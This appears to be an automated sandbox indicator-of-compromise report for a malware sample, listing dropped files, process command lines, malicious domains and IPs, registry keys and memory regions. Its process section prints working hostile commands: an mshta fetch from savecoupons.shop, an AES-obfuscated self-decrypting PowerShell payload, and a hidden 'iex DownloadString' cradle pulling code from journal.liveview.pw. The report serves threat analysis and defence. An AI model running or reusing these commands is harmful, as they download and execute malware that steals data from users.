IOC Report

loading gif

Files

File Path
Type
Category
Malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\singl6[1].mp4
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ib0jx4n.dxz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj3jmtjd.muo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0gauejz.kyd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvoifloc.let.ps1
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 52
ASCII text, with very long lines (9542)
downloaded

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
"C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129)
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
grannyejh.lat
malicious
https://savecoupons.shop/
unknown
malicious
https://surmisehotte.click/api
104.21.96.1
malicious
https://savecoupons.shop/si
unknown
malicious
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
unknown
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
unknown
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
unknown
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
unknown
https://shop.advanceautoparts.com/web/OrderItemDisplay
unknown
https://savecoupons.shop/singl6.mp4t%
unknown
http://dns-tunnel-check.googlezip.net/connect
unknown
http://polymer.github.io/AUTHORS.txt
unknown
https://www.zappos.com/cart
unknown
https://www.guitarcenter.com/cart
unknown
http://unisolated.invalid/
unknown
https://setup.office.com
unknown
https://www.altardstate.com/cart/
unknown
https://surmisehotte.click/hur
unknown
https://savecoupons.shop/singl6.mp4...
unknown
https://www.adorama.com/als.mvc/cartview
unknown
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
unknown
https://www.bestbuy.com/cart
unknown
https://packetstormsecurity.com/files/download/22459/BIOS320.EXEr
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://crbug.com/593024
unknown
http://polymer.github.io/PATENTS.txt
unknown
https://www.google.com/search?q=autoit
unknown
https://www.ae.com/us/en/cart
unknown
https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
unknown
https://www.ecosia.org/newtab/
unknown
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
unknown
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
unknown
https://www.gamestop.com/cart/
unknown
https://www.boostmobile.com/cart.html
unknown
https://packetstormsecurity.com/
unknown
https://www.samsclub.com/cart
unknown
https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
unknown
https://m.google.com/devicemanagement/data/api
unknown
https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlndler7
unknown
https://docs.google.com/presentation/u/0/create?usp=chrome_actions
unknown
https://www.overstock.com/cart
unknown
https://www.bloomingdales.com/my-bag
unknown
https://gemini.google.com/app?q=
unknown
https://publickeyservice.pa.gcp.privacysandboxservices.com
unknown
https://secure.newegg.com/shop/cart
unknown
https://secure.eicar.org/eicar.com.txt
unknown
https://gemini.google.com/app?q=searchTerms
unknown
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
unknown
https://www.jcrew.com/checkout/cart
unknown
https://uk.search.yahoo.com/search
unknown
https://setup.office.com/signin-oidc
unknown
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
unknown
https://www.officedepot.com/cart/shoppingCart.do
unknown
https://googleads.g.doubleclick.net/
unknown
https://chrome.google.com/webstoreLDDiscover
unknown
http://anglebug.com/42266842
unknown
https://lens.google.com/gen204
unknown
https://surmisehotte.click/H
unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
unknown
https://surmisehotte.click/
unknown
https://www.google.com/search?q=at
unknown
https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
unknown
http://anglebug.com/42263580
unknown
https://apis.google.com
unknown
https://savecoupons.shop/singl6.mp4ventindowsINetCookiesL
unknown
https://surmisehotte.click//
unknown
http://polymer.github.io/CONTRIBUTORS.txt
unknown
https://www.talbots.com/cart
unknown
https://google-ohttp-relay-query.fastly-edge.com/2P
unknown
https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
unknown
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
unknown
https://www.bhphotovideo.com/find/cart.jsp
unknown
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
unknown
https://www.vitalsource.com/cart
unknown
https://issuetracker.google.com/292285899
unknown
https://www.carid.com/cart.php
unknown
https://savecoupons.shop/singl6.mp4WinSta0
unknown
https://www.pokemoncenter.com/cart
unknown
https://lens.google.com/v3/upload
unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
172.217.15.196
https://recoveringlib.blogspot.com/
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://anglebug.com/42265720
unknown
http://anglebug.com/42264571
unknown
https://lens.google.com/upload
unknown
https://www.homedepot.com/mycart/home
unknown
https://docs.google.com/document/?usp=installed_webapp
unknown
https://beastacademy.com/checkout/cart
unknown
https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
unknown
https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
unknown
https://www.belk.com/shopping-bag/
unknown
https://www.neimanmarcus.com/checkout/cart.jsp
unknown
https://mail.google.com/mail/
unknown
https://myaccount.google.com/shielded-email2B
unknown
https://www.autoitscript.com/
unknown
https://myshop.amplify.com/cart
unknown
https://www.brownells.com/aspx/store/cart.aspx
unknown
https://www.google.com/tools/feedback/chrome/__submit
unknown
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
unknown
https://www.basspro.com/shop/AjaxOrderItemDisplayView
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
surmisehotte.click
104.21.96.1
malicious
journal.liveview.pw
104.21.37.173
malicious
savecoupons.shop
172.67.223.7
malicious
www.google.com
172.217.15.196

IPs

IP
Domain
Country
Malicious
192.168.11.20
unknown
unknown
malicious
172.67.223.7
savecoupons.shop
United States
malicious
104.21.96.1
surmisehotte.click
United States
malicious
104.21.37.173
journal.liveview.pw
United States
malicious
239.255.255.250
unknown
Reserved
127.0.0.1
unknown
unknown
172.217.15.196
www.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8220000
trusted library section
page read and write
malicious
B7B2000
trusted library allocation
page read and write
781C03E58000
trusted library allocation
page read and write
781C024C8000
trusted library allocation
page read and write
781C03178000
trusted library allocation
page read and write
781C02B44000
trusted library allocation
page read and write
6D00000
heap
page read and write
2188EB61000
heap
page read and write
57669FE000
stack
page read and write
781C024C0000
trusted library allocation
page read and write
5550000
heap
page read and write
781C02F44000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
781C001B0000
trusted library allocation
page read and write
6CE9000
heap
page read and write
7B700000F000
direct allocation
page read and write
6985000
heap
page read and write
781C03FD4000
trusted library allocation
page read and write
6E95000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
B16F000
heap
page read and write
809E000
stack
page read and write
6C58000
heap
page read and write
21888F9B000
heap
page read and write
781C0358C000
trusted library allocation
page read and write
6C35000
heap
page read and write
69B5000
heap
page read and write
781C03158000
trusted library allocation
page read and write
526E000
trusted library allocation
page read and write
6C69000
heap
page read and write
21888F9F000
heap
page read and write
781C0243C000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
B792000
trusted library allocation
page read and write
781C03F60000
trusted library allocation
page read and write
736E000
stack
page read and write
6E85000
trusted library allocation
page read and write
6CA4000
heap
page read and write
781C033AC000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
781C03948000
trusted library allocation
page read and write
69B5000
heap
page read and write
71E000
stack
page read and write
781C02990000
trusted library allocation
page read and write
69B5000
heap
page read and write
21885872000
heap
page read and write
6C3E000
heap
page read and write
781C02744000
trusted library allocation
page read and write
57541EE000
stack
page read and write
B461000
heap
page read and write
781800136000
trusted library allocation
page read and write
6E60000
trusted library allocation
page execute and read and write
6985000
heap
page read and write
7B700002C000
direct allocation
page read and write
781C03914000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C02498000
trusted library allocation
page read and write
781C02590000
trusted library allocation
page read and write
6D5E000
heap
page read and write
B983000
trusted library allocation
page read and write
57631FD000
stack
page read and write
21888430000
trusted library section
page readonly
4CC5000
trusted library allocation
page read and write
B1BC000
heap
page read and write
B201000
heap
page read and write
69B9000
heap
page read and write
6CB9000
heap
page read and write
69C7000
heap
page read and write
781C03E38000
trusted library allocation
page read and write
781C02558000
trusted library allocation
page read and write
781C03948000
trusted library allocation
page read and write
7818005D0000
trusted library allocation
page read and write
688E000
stack
page read and write
8272000
heap
page read and write
6E90000
trusted library allocation
page read and write
57D1000
trusted library allocation
page read and write
781C03F20000
trusted library allocation
page read and write
57551FC000
stack
page read and write
7818004FC000
trusted library allocation
page read and write
21885AD4000
heap
page read and write
B05A000
heap
page read and write
D40000
trusted library allocation
page read and write
78180054C000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
5B0D000
stack
page read and write
52A0000
trusted library allocation
page read and write
6D07000
heap
page read and write
871D000
heap
page read and write
2188EB84000
heap
page read and write
2188EBF7000
heap
page read and write
5F1000
heap
page read and write
6C5D000
heap
page read and write
69B5000
heap
page read and write
7B70000C0000
direct allocation
page read and write
781C02C64000
trusted library allocation
page read and write
781C033C0000
trusted library allocation
page read and write
6CD7000
heap
page read and write
21885878000
heap
page read and write
6F4F000
trusted library allocation
page read and write
781C02C84000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
781C0268C000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03578000
trusted library allocation
page read and write
8320000
trusted library allocation
page read and write
69B9000
heap
page read and write
B444000
heap
page read and write
781C0313C000
trusted library allocation
page read and write
781C0232C000
trusted library allocation
page read and write
781C03920000
trusted library allocation
page read and write
4C84000
trusted library allocation
page read and write
69B7000
heap
page read and write
69B3000
heap
page read and write
B361000
heap
page read and write
781C02CA0000
trusted library allocation
page read and write
6CE0000
heap
page read and write
980000
heap
page read and write
696D000
heap
page read and write
BCF7000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
69B5000
heap
page read and write
781800498000
trusted library allocation
page read and write
AB0000
trusted library section
page read and write
781C03C98000
trusted library allocation
page read and write
8234000
heap
page read and write
69AE000
heap
page read and write
69B5000
heap
page read and write
781C03C74000
trusted library allocation
page read and write
781C02CB0000
trusted library allocation
page read and write
3084000
trusted library allocation
page read and write
473D000
stack
page read and write
78180014C000
trusted library allocation
page read and write
8715000
heap
page read and write
781C037D0000
trusted library allocation
page read and write
781C03710000
trusted library allocation
page read and write
781C02597000
trusted library allocation
page read and write
781C02594000
trusted library allocation
page read and write
57561F9000
stack
page read and write
450E000
stack
page read and write
781800628000
trusted library allocation
page read and write
6E8C000
trusted library allocation
page read and write
781C00601000
trusted library allocation
page read and write
870000
trusted library allocation
page read and write
57569FB000
stack
page read and write
B1D9000
heap
page read and write
77C0000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
69B5000
heap
page read and write
6C3E000
heap
page read and write
781800474000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C040EC000
trusted library allocation
page read and write
781C03040000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C028C8000
trusted library allocation
page read and write
781C023BC000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C02524000
trusted library allocation
page read and write
69B3000
heap
page read and write
6F4F000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02C59000
trusted library allocation
page read and write
781C0403C000
trusted library allocation
page read and write
AD0000
trusted library allocation
page read and write
57649FD000
stack
page read and write
6C3E000
stack
page read and write
781C0239C000
trusted library allocation
page read and write
781800168000
trusted library allocation
page read and write
C190000
heap
page read and write
781C02288000
trusted library allocation
page read and write
781C0309C000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C03020000
trusted library allocation
page read and write
D2F000
stack
page read and write
BC50000
trusted library allocation
page read and write
6CA2000
heap
page read and write
781C03E01000
trusted library allocation
page read and write
74A9000
trusted library allocation
page read and write
781C0412C000
trusted library allocation
page read and write
781C03F98000
trusted library allocation
page read and write
6C99000
heap
page read and write
6C58000
heap
page read and write
6C5C000
heap
page read and write
503F000
heap
page read and write
BCF7000
trusted library allocation
page read and write
BC6E000
trusted library allocation
page read and write
69D2000
heap
page read and write
781C02CB0000
trusted library allocation
page read and write
6D0E000
heap
page read and write
781C023C8000
trusted library allocation
page read and write
6E9D000
trusted library allocation
page read and write
57689FE000
stack
page read and write
6BB0000
trusted library allocation
page read and write
6AFE000
stack
page read and write
781C02401000
trusted library allocation
page read and write
6C34000
heap
page read and write
2AA0000
heap
page read and write
30FC000
heap
page read and write
69B5000
heap
page read and write
781C0401C000
trusted library allocation
page read and write
B405000
heap
page read and write
781C0286C000
trusted library allocation
page read and write
781C03488000
trusted library allocation
page read and write
6CA2000
heap
page read and write
B206000
heap
page read and write
B983000
trusted library allocation
page read and write
6C0000
trusted library allocation
page read and write
57521FF000
stack
page read and write
31DD000
heap
page read and write
B145000
heap
page read and write
781C02968000
trusted library allocation
page read and write
781C03350000
trusted library allocation
page read and write
781C040C8000
trusted library allocation
page read and write
781C02FD8000
trusted library allocation
page read and write
781C02664000
trusted library allocation
page read and write
B379000
heap
page read and write
69B3000
heap
page read and write
781C027A0000
trusted library allocation
page read and write
781C03F58000
trusted library allocation
page read and write
781C0393D000
trusted library allocation
page read and write
781C0257C000
trusted library allocation
page read and write
781C03968000
trusted library allocation
page read and write
78180003C000
trusted library allocation
page read and write
781C026F4000
trusted library allocation
page read and write
781C02AE8000
trusted library allocation
page read and write
781C03430000
trusted library allocation
page read and write
B409000
heap
page read and write
781C02A1B000
trusted library allocation
page read and write
781C02590000
trusted library allocation
page read and write
6CAF000
heap
page read and write
742E000
stack
page read and write
781C02470000
trusted library allocation
page read and write
69C4000
heap
page read and write
6F4F000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
707D000
stack
page read and write
21888F9B000
heap
page read and write
781C03948000
trusted library allocation
page read and write
781C03C88000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C00068000
trusted library allocation
page read and write
2188EBE8000
heap
page read and write
7820000
trusted library allocation
page read and write
2188EBD7000
heap
page read and write
21888F92000
heap
page read and write
822E000
heap
page read and write
2188EBF7000
heap
page read and write
57629FA000
stack
page read and write
57681FD000
stack
page read and write
69B5000
heap
page read and write
2188EB95000
heap
page read and write
781800520000
trusted library allocation
page read and write
B02D000
heap
page read and write
69B3000
heap
page read and write
69B5000
heap
page read and write
7510000
trusted library allocation
page read and write
E00000
trusted library allocation
page execute and read and write
6C42000
heap
page read and write
928000
trusted library allocation
page read and write
6C5C000
heap
page read and write
781C041D0000
trusted library allocation
page read and write
781C0358C000
trusted library allocation
page read and write
2188EB86000
heap
page read and write
21885A90000
trusted library allocation
page read and write
69B9000
heap
page read and write
6E94000
trusted library allocation
page read and write
781C02968000
trusted library allocation
page read and write
2188EB61000
heap
page read and write
6CEC000
heap
page read and write
781800638000
trusted library allocation
page read and write
781C0232C000
trusted library allocation
page read and write
492B000
trusted library allocation
page read and write
4A6E000
stack
page read and write
31D0000
heap
page read and write
6C51000
heap
page read and write
6C30000
trusted library allocation
page execute and read and write
781C03068000
trusted library allocation
page read and write
781C02790000
trusted library allocation
page read and write
781C024D0000
trusted library allocation
page read and write
4480000
heap
page read and write
B1BC000
heap
page read and write
781800114000
trusted library allocation
page read and write
781800518000
trusted library allocation
page read and write
781C02710000
trusted library allocation
page read and write
DB0000
trusted library allocation
page read and write
781C036F4000
trusted library allocation
page read and write
31AC000
heap
page read and write
B1BC000
heap
page read and write
781C02CA0000
trusted library allocation
page read and write
78180064C000
trusted library allocation
page read and write
781C04001000
trusted library allocation
page read and write
781C02774000
trusted library allocation
page read and write
781C03DBC000
trusted library allocation
page read and write
BAFA000
trusted library allocation
page read and write
8709000
heap
page read and write
69B3000
heap
page read and write
B405000
heap
page read and write
7818004B8000
trusted library allocation
page read and write
781C03D48000
trusted library allocation
page read and write
781800650000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
298800001000
trusted library allocation
page read and write
6CA5000
heap
page read and write
2188953B000
heap
page read and write
880000
heap
page read and write
781C03624000
trusted library allocation
page read and write
781C026F6000
trusted library allocation
page read and write
6DEE000
heap
page read and write
460000
heap
page read and write
57501FF000
stack
page read and write
781800510000
trusted library allocation
page read and write
21888F95000
heap
page read and write
4E30000
trusted library allocation
page read and write
781800204000
trusted library allocation
page read and write
69B5000
heap
page read and write
69B5000
heap
page read and write
82B7000
heap
page read and write
2188EB65000
heap
page read and write
6E90000
trusted library allocation
page read and write
21888F95000
heap
page read and write
8C0000
heap
page readonly
2188EBB7000
heap
page read and write
B155000
heap
page read and write
2188EB2E000
heap
page read and write
69B5000
heap
page read and write
57661FE000
stack
page read and write
781C022CC000
trusted library allocation
page read and write
82ED000
heap
page read and write
30F0000
heap
page read and write
B182000
heap
page read and write
21888FA2000
heap
page read and write
781C04184000
trusted library allocation
page read and write
863000
trusted library allocation
page execute and read and write
69B9000
heap
page read and write
8650000
heap
page read and write
6CAA000
heap
page read and write
74F0000
trusted library allocation
page read and write
6A0000
trusted library allocation
page read and write
781C03780000
trusted library allocation
page read and write
7818000A4000
trusted library allocation
page read and write
69B5000
heap
page read and write
70DE000
stack
page read and write
5218000
trusted library allocation
page read and write
781C03E94000
trusted library allocation
page read and write
781800110000
trusted library allocation
page read and write
DF0000
trusted library allocation
page read and write
781C02CB0000
trusted library allocation
page read and write
2188EBD7000
heap
page read and write
6E8C000
trusted library allocation
page read and write
844C000
heap
page read and write
69B5000
heap
page read and write
6C4F000
heap
page read and write
2188E7D0000
trusted library section
page read and write
781C02C04000
trusted library allocation
page read and write
781C0331A000
trusted library allocation
page read and write
69B3000
heap
page read and write
69BF000
heap
page read and write
81C8000
heap
page read and write
781C0392C000
trusted library allocation
page read and write
781C04020000
trusted library allocation
page read and write
781C04008000
trusted library allocation
page read and write
781C026D0000
trusted library allocation
page read and write
781C03810000
trusted library allocation
page read and write
B05B000
heap
page read and write
6F80000
heap
page read and write
B180000
heap
page read and write
B02E000
heap
page read and write
781C03604000
trusted library allocation
page read and write
781C03CAC000
trusted library allocation
page read and write
781C023E0000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B9000
heap
page read and write
B10000
trusted library allocation
page read and write
B113000
heap
page read and write
69B9000
heap
page read and write
21888FA3000
heap
page read and write
6985000
heap
page read and write
781C036E4000
trusted library allocation
page read and write
781C02CF4000
trusted library allocation
page read and write
69B5000
heap
page read and write
81E6000
heap
page read and write
B0B8000
heap
page read and write
6E90000
trusted library allocation
page read and write
2188958D000
heap
page read and write
781C02CB0000
trusted library allocation
page read and write
781800208000
trusted library allocation
page read and write
781C03DF8000
trusted library allocation
page read and write
781C02A90000
trusted library allocation
page read and write
90D000
stack
page read and write
6F4F000
trusted library allocation
page read and write
69B3000
heap
page read and write
21888FA3000
heap
page read and write
781C0347C000
trusted library allocation
page read and write
2188EBF9000
heap
page read and write
6FBE000
stack
page read and write
781C03D74000
trusted library allocation
page read and write
69B3000
heap
page read and write
21888F93000
heap
page read and write
31CB000
heap
page read and write
6C9B000
heap
page read and write
69B5000
heap
page read and write
DA0000
heap
page read and write
6E94000
trusted library allocation
page read and write
82E0000
trusted library allocation
page execute and read and write
86A1000
heap
page read and write
781C02D3C000
trusted library allocation
page read and write
781C03A2C000
trusted library allocation
page read and write
57619FB000
stack
page read and write
781C03770000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
781C03FC4000
trusted library allocation
page read and write
2188EB84000
heap
page read and write
6CA2000
heap
page read and write
3198000
heap
page read and write
6C45000
heap
page read and write
930000
trusted library allocation
page execute and read and write
670000
heap
page read and write
781C03FC8000
trusted library allocation
page read and write
8679000
heap
page read and write
7477000
trusted library allocation
page read and write
5AB000
heap
page read and write
B91A000
trusted library allocation
page read and write
69C3000
heap
page read and write
6C42000
heap
page read and write
69CD000
stack
page read and write
2188EBD7000
heap
page read and write
6E70000
trusted library section
page read and write
7300000
trusted library allocation
page read and write
6C4C000
heap
page read and write
781C00A5C000
trusted library allocation
page read and write
6C3E000
heap
page read and write
6C3E000
heap
page read and write
781C03670000
trusted library allocation
page read and write
B461000
heap
page read and write
6C9B000
heap
page read and write
860000
trusted library allocation
page read and write
650000
